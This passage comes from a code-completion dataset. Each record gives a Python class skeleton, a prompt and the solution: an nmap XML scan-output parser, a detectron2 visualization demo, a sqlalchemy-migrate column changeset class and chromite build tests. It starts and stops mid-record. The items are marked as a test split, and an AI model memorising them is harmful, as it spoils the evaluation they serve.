libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000035", 
"length_bytes": 3775, "license_type": "permissive", "methods": [{"docstring": "parse data from path", "name": "parse_path", "signature": "def parse_path(cls, path)"}, {"docstring": "parse raw string data", "name": "_parse_data", "signature": "def _parse_data(cls, data, pidb)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004105", "prompt": "Implement the Python class `ParserModule` described below.\n\nClass description:\nnmap xml output parser\n\nMethod signatures and docstrings:\n- def parse_path(cls, path): parse data from path\n- def _parse_data(cls, data, pidb): parse raw string data", "prompted_full_text": "Implement the Python class `ParserModule` described below.\n\nClass description:\nnmap xml output parser\n\nMethod signatures and docstrings:\n- def parse_path(cls, path): parse data from path\n- def _parse_data(cls, data, pidb): parse raw string data\n\n<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "revision_id": "d5d8e9cdd6dd058dd91eb119965a3f9f737e5c34", "skeleton": "<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": 
"data/stack_v2_sparse_classes_30k", "solution": "class ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n", "source": "the_stack_v2_python_sparse", "source_path": "sner/plugin/nmap/parser.py", "source_repo": "bodik/sner4", "split": "test", "star_events_count": 13} {"blob_id": "23ebeeab9485926e5e9068ca601a02bc46d51487", "bodies": ["self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\nself.cpu_device = torch.device('cpu')\nself.instance_mode = instance_mode\nself.predictor = BatchPredictor(cfg)", "vis_output = None\nall_predictions = self.predictor(image_list)\nif visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\nreturn (all_predictions, vis_output)"], "bodies_text": "<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = 
instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "VisualizationDemo", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000036", "length_bytes": 8707, "license_type": "permissive", "methods": [{"docstring": "Args: cfg (CfgNode): instance_mode (ColorMode):", "name": "__init__", "signature": "def __init__(self, cfg, instance_mode=ColorMode.IMAGE)"}, {"docstring": "Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. 
vis_output (VisImage): the visualized image output.", "name": "run_on_image", "signature": "def run_on_image(self, image_list, visualize=0)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001292", "prompt": "Implement the Python class `VisualizationDemo` described below.\n\nClass description:\nImplement the VisualizationDemo class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg, instance_mode=ColorMode.IMAGE): Args: cfg (CfgNode): instance_mode (ColorMode):\n- def run_on_image(self, image_list, visualize=0): Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.", "prompted_full_text": "Implement the Python class `VisualizationDemo` described below.\n\nClass description:\nImplement the VisualizationDemo class.\n\nMethod signatures and docstrings:\n- def __init__(self, cfg, instance_mode=ColorMode.IMAGE): Args: cfg (CfgNode): instance_mode (ColorMode):\n- def run_on_image(self, image_list, visualize=0): Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\n\n<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n<|end_body_0|>\n\n<|body_start_1|>\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n<|end_body_1|>\n", "revision_id": "999639b58ef2b5b6fcc5a8b27cba8777452a7f1f", "skeleton": "<|skeleton|>\nclass VisualizationDemo:\n\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n <|body_0|>\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. 
vis_output (VisImage): the visualized image output.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VisualizationDemo:\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"Args: cfg (CfgNode): instance_mode (ColorMode):\"\"\"\n self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0] if len(cfg.DATASETS.TEST) else '__unused')\n self.cpu_device = torch.device('cpu')\n self.instance_mode = instance_mode\n self.predictor = BatchPredictor(cfg)\n\n def run_on_image(self, image_list, visualize=0):\n \"\"\"Args: image (np.ndarray): an image of shape (H, W, C) (in BGR order). This is the format used by OpenCV. Returns: predictions (dict): the output of the model. vis_output (VisImage): the visualized image output.\"\"\"\n vis_output = None\n all_predictions = self.predictor(image_list)\n if visualize:\n predictions = all_predictions[0]\n image = image_list[0]\n visualizer = Visualizer(image, self.metadata, instance_mode=self.instance_mode)\n if 'panoptic_seg' in predictions:\n panoptic_seg, segments_info = predictions['panoptic_seg']\n vis_output = visualizer.draw_panoptic_seg_predictions(panoptic_seg.to(self.cpu_device), segments_info)\n else:\n if 'sem_seg' in predictions:\n vis_output = visualizer.draw_sem_seg(predictions['sem_seg'].argmax(dim=0).to(self.cpu_device))\n if 'instances' in predictions:\n instances = predictions['instances'].to(self.cpu_device)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n return (all_predictions, vis_output)\n", "source": "the_stack_v2_python_sparse", "source_path": "Object-Goal-Navigation/agents/utils/semantic_prediction.py", "source_repo": "haokuanluo/Object-Goal-Navigation", "split": "test", "star_events_count": 3} {"blob_id": "286342270909fcc1e02f8c60a70b9e23a607b65d", "bodies": ["if 'table' not in k:\n k['table'] = self.table\nif 'engine' not in k:\n k['engine'] = k['table'].bind\nreturn alter_column(self, *p, **k)", "table = _normalize_table(self, table)\nengine = table.bind\nvisitorcallable = get_engine_visitor(engine, 'columngenerator')\nengine._run_visitor(visitorcallable, self, *args, **kwargs)\nif self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\nreturn self", "table = _normalize_table(self, table)\nengine = table.bind\nvisitorcallable = get_engine_visitor(engine, 'columndropper')\nengine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\nreturn self"], "bodies_text": "<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "class_docstring": "Changeset 
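run_on_image in the VisualizationDemo record picks a drawing routine by which keys the prediction dict carries: panoptic wins outright; otherwise an instances drawing overwrites a semantic-segmentation one. The Visualizer calls in the record are detectron2 API; the precedence itself can be isolated in plain Python:

```python
def pick_visualization(predictions):
    """Mirror run_on_image's key-based dispatch and report the chosen drawer."""
    if 'panoptic_seg' in predictions:
        return 'draw_panoptic_seg_predictions'   # panoptic takes precedence
    chosen = None
    if 'sem_seg' in predictions:
        chosen = 'draw_sem_seg'
    if 'instances' in predictions:
        chosen = 'draw_instance_predictions'     # instances overwrite sem_seg
    return chosen

print(pick_visualization({'panoptic_seg': object()}))                    # panoptic wins
print(pick_visualization({'sem_seg': object(), 'instances': object()}))  # instances win
```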
extensions to SQLAlchemy columns", "class_name": "ChangesetColumn", "detected_licenses": ["CC-BY-2.5", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000037", "length_bytes": 13759, "license_type": "permissive", "methods": [{"docstring": "Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.", "name": "alter", "signature": "def alter(self, *p, **k)"}, {"docstring": "Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.", "name": "create", "signature": "def create(self, table=None, *args, **kwargs)"}, {"docstring": "Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.", "name": "drop", "signature": "def drop(self, table=None, *args, **kwargs)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004653", "prompt": "Implement the Python class `ChangesetColumn` described below.\n\nClass description:\nChangeset extensions to SQLAlchemy columns\n\nMethod signatures and docstrings:\n- def alter(self, *p, **k): Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. 
May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\n- def create(self, table=None, *args, **kwargs): Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\n- def drop(self, table=None, *args, **kwargs): Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.", "prompted_full_text": "Implement the Python class `ChangesetColumn` described below.\n\nClass description:\nChangeset extensions to SQLAlchemy columns\n\nMethod signatures and docstrings:\n- def alter(self, *p, **k): Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\n- def create(self, table=None, *args, **kwargs): Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\n- def drop(self, table=None, *args, **kwargs): Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\n\n<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. 
``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n<|end_body_0|>\n\n<|body_start_1|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n<|end_body_2|>\n", "revision_id": "3c44ecaf4b2e1f2d7269eabef19cbd2e88b3a99c", "skeleton": "<|skeleton|>\nclass ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n <|body_0|>\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. ``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n <|body_1|>\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ChangesetColumn:\n \"\"\"Changeset extensions to SQLAlchemy columns\"\"\"\n\n def alter(self, *p, **k):\n \"\"\"Alter a column's definition: ``ALTER TABLE ALTER COLUMN``. May supply a new column object, or a list of properties to change. For example; the following are equivalent: col.alter(Column('myint', Integer, nullable=False)) col.alter('myint', Integer, nullable=False) col.alter(name='myint', type=Integer, nullable=False) Column name, type, default, and nullable may be changed here. Note that for column defaults, only PassiveDefaults are managed by the database - changing others doesn't make sense.\"\"\"\n if 'table' not in k:\n k['table'] = self.table\n if 'engine' not in k:\n k['engine'] = k['table'].bind\n return alter_column(self, *p, **k)\n\n def create(self, table=None, *args, **kwargs):\n \"\"\"Create this column in the database. Assumes the given table exists. 
``ALTER TABLE ADD COLUMN``, for most databases.\"\"\"\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columngenerator')\n engine._run_visitor(visitorcallable, self, *args, **kwargs)\n if self.foreign_keys:\n for fk in self.foreign_keys:\n visitorcallable = get_engine_visitor(engine, 'columnfkgenerator')\n engine._run_visitor(visitorcallable, self, fk=fk)\n return self\n\n def drop(self, table=None, *args, **kwargs):\n \"\"\"Drop this column from the database, leaving its table intact. ``ALTER TABLE DROP COLUMN``, for most databases.\"\"\"\n table = _normalize_table(self, table)\n engine = table.bind\n visitorcallable = get_engine_visitor(engine, 'columndropper')\n engine._run_visitor(lambda dialect, conn: visitorcallable(conn), self, *args, **kwargs)\n return self\n", "source": "the_stack_v2_python_sparse", "source_path": "eggs/sqlalchemy_migrate-0.5.4-py2.7.egg/migrate/changeset/schema.py", "source_repo": "JCVI-Cloud/galaxy-tools-prok", "split": "test", "star_events_count": 0} {"blob_id": "c72430c1dae49d4ab1fb960fe3cbfcbb7732bb96", "bodies": ["cmd = ['--board=randonname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper')\nself.PatchObject(command, 'UseProgressBar', return_value=True)\nwith MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertTrue(operation_run.called)", "cmd = ['--board=randonname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper')\nself.PatchObject(command, 'UseProgressBar', return_value=False)\nwith MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n self.assertFalse(operation_run.called)", "cmds = [['--host', 'power_manager'], ['--board=randomname', 'power_manager'], ['--board=randomname', '--debug', 'power_manager'], ['--board=randomname', '--no-deps', 'power_manager'], ['--board=randomname', '--no-chroot-update', 'power_manager'], ['--board=randomname', '--no-enable-only-latest', 'power_manager']]\nfor cmd in cmds:\n update_chroot = not ('--no-deps' in cmd or '--no-chroot-update' in cmd)\n enable_only_latest = '--no-enable-only-latest' not in cmd\n fake_workon_helper = FakeWorkonHelper()\n self.PatchObject(workon_helper, 'WorkonHelper', return_value=fake_workon_helper)\n with MockBuildCommand(cmd) as build:\n build.inst.Run()\n self.assertEquals(1 if update_chroot else 0, build.chroot_update_called)\n self.assertEquals(1 if enable_only_latest else 0, fake_workon_helper.start_called)\n self.assertEquals(True if enable_only_latest else None, fake_workon_helper.use_workon_only)", "args = ['--board=randomname', 'power_manager']\nself.PatchObject(workon_helper, 'WorkonHelper', return_value=FakeWorkonHelper())\nwith MockBuildCommand(args) as build:\n cmd = partial_mock.In('--backtrack=0')\n build.rc_mock.AddCmdResult(cmd=cmd, returncode=1, error='error\\n')\n with self.OutputCapturer():\n try:\n build.inst.Run()\n except Exception as e:\n logging.error(e)\n self.AssertOutputContainsError(cros_build.BuildCommand._BAD_DEPEND_MSG, check_stderr=True)"], "bodies_text": "<|body_start_0|>\n cmd = ['--board=randonname', 'power_manager']\n self.PatchObject(workon_helper, 'WorkonHelper')\n self.PatchObject(command, 'UseProgressBar', return_value=True)\n with MockBuildCommand(cmd) as build:\n operation_run = self.PatchObject(cros_build.BrilloBuildOperation, 'Run')\n build.inst.Run()\n 
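create and drop in the ChangesetColumn record share one shape: normalize the table, take its bind, look up an engine-specific visitor, and run it. A toy registry makes that lookup-then-run pattern concrete (the table of lambdas below is a stand-in for migrate's get_engine_visitor, not its real machinery):

```python
# Hypothetical stand-in for migrate's get_engine_visitor dispatch table.
VISITORS = {
    ('sqlite', 'columngenerator'): lambda c: f"ALTER TABLE {c['table']} ADD COLUMN {c['name']}",
    ('sqlite', 'columndropper'):   lambda c: f"ALTER TABLE {c['table']} DROP COLUMN {c['name']}",
}

def run_visitor(dialect, kind, column):
    """Look up the engine-specific visitor and apply it, as create()/drop() do."""
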